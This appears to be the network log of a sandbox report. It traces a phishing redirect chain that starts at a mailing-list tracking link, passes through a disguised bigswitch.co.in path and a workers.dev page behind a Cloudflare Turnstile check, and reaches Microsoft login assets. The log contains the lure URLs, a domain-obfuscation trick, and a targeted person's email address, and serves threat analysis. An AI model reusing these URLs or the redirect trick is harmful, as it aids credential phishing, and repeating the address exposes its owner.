                                      Mar 22, 2024 15:24:15.435373068 CET1.1.1.1192.168.2.40xedacNo error (0)shed.dual-low.part-0012.t-0009.t-msedge.netpart-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.435373068 CET1.1.1.1192.168.2.40xedacNo error (0)part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.435373068 CET1.1.1.1192.168.2.40xedacNo error (0)part-0012.t-0009.t-msedge.net13.107.213.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.522278070 CET1.1.1.1192.168.2.40xee06No error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.522278070 CET1.1.1.1192.168.2.40xee06No error (0)sni1gl.wpc.alphacdn.net152.195.19.97A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.523861885 CET1.1.1.1192.168.2.40x6ea3No error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.525860071 CET1.1.1.1192.168.2.40x12bNo error (0)shed.dual-low.part-0012.t-0009.t-msedge.netpart-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.525860071 CET1.1.1.1192.168.2.40x12bNo error (0)part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:15.525860071 CET1.1.1.1192.168.2.40x12bNo error (0)part-0012.t-0009.t-msedge.net13.107.213.40A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:16.921650887 CET1.1.1.1192.168.2.40xe914No error (0)logincdn.msftauth.netcs1227.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:16.921650887 CET1.1.1.1192.168.2.40xe914No error (0)cs1227.wpc.alphacdn.net192.229.211.199A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:16.922409058 CET1.1.1.1192.168.2.40x9cc6No error (0)logincdn.msftauth.netcs1227.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:30.350936890 CET1.1.1.1192.168.2.40x3437No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:30.350936890 CET1.1.1.1192.168.2.40x3437No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                      Mar 22, 2024 15:24:50.275041103 CET1.1.1.1192.168.2.40xa124No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                      Mar 22, 2024 15:24:50.275041103 CET1.1.1.1192.168.2.40xa124No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                      • manage.kmail-lists.com
                                      • fs.microsoft.com
                                      • bigswitch.co.in
                                        • 33208b95.7187b59e75e5ee4922ee53c8.workers.dev
                                      • https:
                                        • challenges.cloudflare.com
                                        • 24karat.us
                                        • logincdn.msftauth.net
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973669.49.245.172803592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      Mar 22, 2024 15:23:40.192507982 CET545OUTGET ///////////portfolio////////wpfile///////////wp-user%E3%80%82////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20= HTTP/1.1
                                      Host: bigswitch.co.in
                                      Connection: keep-alive
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Mar 22, 2024 15:23:50.629138947 CET279INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:49 GMT
                                      Server: Apache
                                      refresh: 0;url=https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev?qrc=jgol@bgclinic.com
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Mar 22, 2024 15:23:50.870649099 CET489OUTGET /favicon.ico HTTP/1.1
                                      Host: bigswitch.co.in
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                      Referer: http://bigswitch.co.in///////////portfolio////////wpfile///////////wp-user%E3%80%82////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Mar 22, 2024 15:23:50.980176926 CET515INHTTP/1.1 404 Not Found
                                      Date: Fri, 22 Mar 2024 14:23:50 GMT
                                      Server: Apache
                                      Content-Length: 315
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973554.242.173.1684433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:39 UTC971OUTGET /subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20= HTTP/1.1
                                      Host: manage.kmail-lists.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-User: ?1
                                      Sec-Fetch-Dest: document
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:39 UTC567INHTTP/1.1 302 Found
                                      Allow: OPTIONS, POST, GET
                                      Content-Language: en-us
                                      Content-Security-Policy: object-src 'none'; base-uri 'none'; script-src 'report-sample' 'strict-dynamic' 'unsafe-eval' https://cdn.ampproject.org/; report-uri /csp/
                                      Content-Type: text/html; charset=utf-8
                                      Date: Fri, 22 Mar 2024 14:23:39 GMT
                                      Location: http://bigswitch%E3%80%82co%E3%80%82in///////////portfolio////////wpfile///////////wp-user%E3%80%82////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=
                                      Server: nginx
                                      Vary: Accept-Language, Cookie
                                      Content-Length: 0
                                      Connection: Close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.44974023.51.58.94443
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:43 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      Accept-Encoding: identity
                                      User-Agent: Microsoft BITS/7.8
                                      Host: fs.microsoft.com
                                      2024-03-22 14:23:43 UTC467INHTTP/1.1 200 OK
                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                      Content-Type: application/octet-stream
                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                      Server: ECAcc (chd/0790)
                                      X-CID: 11
                                      X-Ms-ApiVersion: Distribute 1.2
                                      X-Ms-Region: prod-eus2-z1
                                      Cache-Control: public, max-age=96815
                                      Date: Fri, 22 Mar 2024 14:23:43 GMT
                                      Connection: close
                                      X-CID: 2


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.44974123.51.58.94443
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:43 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      Accept-Encoding: identity
                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                      Range: bytes=0-2147483646
                                      User-Agent: Microsoft BITS/7.8
                                      Host: fs.microsoft.com
                                      2024-03-22 14:23:43 UTC455INHTTP/1.1 200 OK
                                      ApiVersion: Distribute 1.1
                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                      Content-Type: application/octet-stream
                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                      Server: ECAcc (chd/0778)
                                      X-CID: 11
                                      Cache-Control: public, max-age=96760
                                      Date: Fri, 22 Mar 2024 14:23:43 GMT
                                      Content-Length: 55
                                      Connection: close
                                      X-CID: 2
                                      2024-03-22 14:23:43 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449742172.67.132.204433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:51 UTC730OUTGET /?qrc=jgol@bgclinic.com HTTP/1.1
                                      Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.dev
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: document
                                      Referer: http://bigswitch.co.in/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:51 UTC579INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:51 GMT
                                      Content-Type: text/html;charset=UTF-8
                                      Content-Length: 3255
                                      Connection: close
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vDVTz4rNIx8LtXGSV2EKMHPWSeRBk16TfFuuky8WcDiaIOwXLHZHTLN%2FBXV1iTE7Y0ps4NOnVaV8YgATj7UtGi2WMKrXsoa2u1qrvCXzJOwKzBRHh849UhcawnAS72jHLZu%2FBZ9zZqaXUPIy0Pfl3o3gUA8cBND4bCUnzR8gWbU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8686d789cff38c2f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:51 UTC790INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72
                                      Data Ascii: <!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewpor
                                      2024-03-22 14:23:51 UTC1369INData Raw: 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30
                                      Data Ascii: ,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-color:transparent;text-decoration:none;color:#0
                                      2024-03-22 14:23:51 UTC1096INData Raw: 3a 31 72 65 6d 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 72 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32
                                      Data Ascii: :1rem}}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}@media (prefers-color-scheme:dark){body{background-color:#222


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449744104.17.3.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:51 UTC604OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:51 UTC367INHTTP/1.1 302 Found
                                      Date: Fri, 22 Mar 2024 14:23:51 GMT
                                      Content-Length: 0
                                      Connection: close
                                      access-control-allow-origin: *
                                      cache-control: max-age=300, public
                                      location: /turnstile/v0/b/de9364586261/api.js?onload=onloadTurnstileCallback
                                      cross-origin-resource-policy: cross-origin
                                      Server: cloudflare
                                      CF-RAY: 8686d78d2a3a5e86-EWR
                                      alt-svc: h3=":443"; ma=86400


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449745104.17.3.1844433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:23:52 UTC619OUTGET /turnstile/v0/b/de9364586261/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:23:52 UTC340INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:23:52 GMT
                                      Content-Type: application/javascript; charset=UTF-8
                                      Content-Length: 39815
                                      Connection: close
                                      Access-Control-Allow-Origin: *
                                      Cache-Control: max-age=31536000
                                      Cross-Origin-Resource-Policy: cross-origin
                                      Server: cloudflare
                                      CF-RAY: 8686d792dfb31835-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-03-22 14:23:52 UTC1029INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 2c 72 2c 74 2c 61 2c 75 2c 73 2c 67 29 7b 74 72 79 7b 76 61 72 20 79 3d 65 5b 73 5d 28 67 29 2c 6d 3d 79 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 74 28 66 29 3b 72 65 74 75 72 6e 7d 79 2e 64 6f 6e 65 3f 72 28 6d 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6d 29 2e 74 68 65 6e 28 61 2c 75 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 61 2c 75 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                      Data Ascii: "use strict";(function(){function gt(e,r,t,a,u,s,g){try{var y=e[s](g),m=y.value}catch(f){t(f);return}y.done?r(m):Promise.resolve(m).then(a,u)}function yt(e){return function(){var r=this,t=arguments;return new Promise(function(a,u){var s=e.apply(r,t);funct
                                      2024-03-22 14:23:52 UTC1369INData Raw: 74 69 6f 6e 28 75 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 75 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 61 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 5f 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 69 72 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74
                                      Data Ascii: tion(u){return Object.getOwnPropertyDescriptor(e,u).enumerable})),t.push.apply(t,a)}return t}function _t(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):ir(Object(r)).forEach(funct
                                      2024-03-22 14:23:52 UTC1369INData Raw: 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 54 65 28 65 2c 72 29 7b 76 61 72 20 74 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 5b 30 5d 26 31 29 74 68 72 6f 77 20 73 5b 31 5d 3b 72 65 74 75 72 6e 20 73 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 61 2c 75 2c 73 2c 67 3b 72 65 74 75 72 6e 20 67 3d 7b 6e 65 78 74 3a 79 28 30 29 2c 74 68 72 6f 77 3a 79 28 31 29 2c 72 65 74 75 72 6e 3a 79 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 67 5b 53 79 6d 62 6f
                                      Data Ascii: &typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Te(e,r){var t={label:0,sent:function(){if(s[0]&1)throw s[1];return s[1]},trys:[],ops:[]},a,u,s,g;return g={next:y(0),throw:y(1),return:y(2)},typeof Symbol=="function"&&(g[Symbo
                                      2024-03-22 14:23:52 UTC1369INData Raw: 72 6d 61 6c 22 2c 65 2e 43 4f 4d 50 41 43 54 3d 22 63 6f 6d 70 61 63 74 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 6a 7c 7c 28 6a 3d 7b 7d 29 29 3b 76 61 72 20 49 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 49 65 7c 7c 28 49 65 3d 7b 7d 29 29 3b 76 61 72 20 66 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 66 65 7c 7c 28 66 65 3d 7b 7d 29 29 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e
                                      Data Ascii: rmal",e.COMPACT="compact",e.INVISIBLE="invisible"})(j||(j={}));var Ie;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Ie||(Ie={}));var fe;(function(e){e.NEVER="never",e.AUTO="auto"})(fe||(fe={}));var q;(function(e){e.NEVER="never",e.MANUAL="man
                                      2024-03-22 14:23:52 UTC1369INData Raw: 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 44 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 57 3d 22 30 2f 30 22 3b 76 61 72 20 53 74 3d 33 30 30 2c 49 74 3d 31 30 3b 76 61 72 20 69 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 4d 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 41 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 4f 74 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 52 74 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 43 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 6b 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 4e 74 3d 22 67 2d 72 65 63 61 70 74
                                      Data Ascii: y"],e)}function Ze(e){return D(["render","execute"],e)}var W="0/0";var St=300,It=10;var ie="cf-chl-widget-",M="cloudflare-challenge",At=".cf-turnstile",Ot=".cf-challenge",Rt=".g-recaptcha",Ct="cf_challenge_response",kt="cf-turnstile-response",Nt="g-recapt
